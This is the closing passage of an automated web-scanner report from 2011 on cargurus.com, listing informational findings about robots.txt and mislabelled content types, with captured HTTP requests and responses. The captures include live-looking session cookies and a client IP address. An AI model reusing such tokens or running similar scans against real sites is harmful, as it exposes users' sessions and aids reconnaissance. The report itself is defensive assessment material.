The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.cargurus.com

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Jun 2011 17:12:04 GMT
Accept-Ranges: bytes
Content-Length: 81
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/

User-agent: Googlebot
Disallow: /

User-agent: *
Disallow: /

10. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


10.1. http://www.cargurus.com/Cars/inventorylisting/priceAnalysis.action  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/priceAnalysis.action

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /Cars/inventorylisting/priceAnalysis.action?inventoryListing=24317110&zip=02110&distance=MILES_75 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.3.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:17 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:17 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain;charset=ISO-8859-1
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 1425

{"avgLine":[[16000,24792.426803453418],[93022,17904.134562963693]],"mileage":19849,"price":20900,"nearbyListingPoints":[[63451,18491],[27759,20900],[38132,20995],[29914,21790],[43917,22888],[32737,229
...[SNIP]...

10.2. http://www.cargurus.com/Cars/jsonBannerAds.action  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargurus.com
Path:   /Cars/jsonBannerAds.action

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /Cars/jsonBannerAds.action?jumpstartAdFormats=LEADERBOARD&entity=m4&adPageUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26ign-modelId-entitySelectingHelper.selectedEntity%3D%26entitySelectingHelper.selectedEntity%3Dm4%26zip%3D02110%26sourceContext%3DcarGurusHomePage_false_0&jumpstartNetwork=NEW HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; jag_rsi_segs=; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Coyote-2-c0a8020a=c0a8021e:0; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:11 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:11 GMT
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain;charset=ISO-8859-1
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 1719

{"jsAdsMap":{"LEADERBOARD":"\n\r\n\n\r\n\n\n\n\n<img src=\"/Cars/ping/doubleClickBannerAd?jumpstartRequestUrl=http%3A%2F%2Fad.doubleclick.net%2Fpfadx%2Fguru.new.dfp%2Fbg%2Fmak%2Facura%3Bdcmt%3Dtext%2F
...[SNIP]...

10.3. http://www.cargurus.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargurus.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:12:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Aug 2008 22:35:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

..............h...&... ..............(....... ...........@.....................................N...........n...5...........\...&...C...|...............+...8...e...r...........K...................-...
...[SNIP]...

Report generated by XSS.CX at Sun Sep 18 13:18:21 CDT 2011.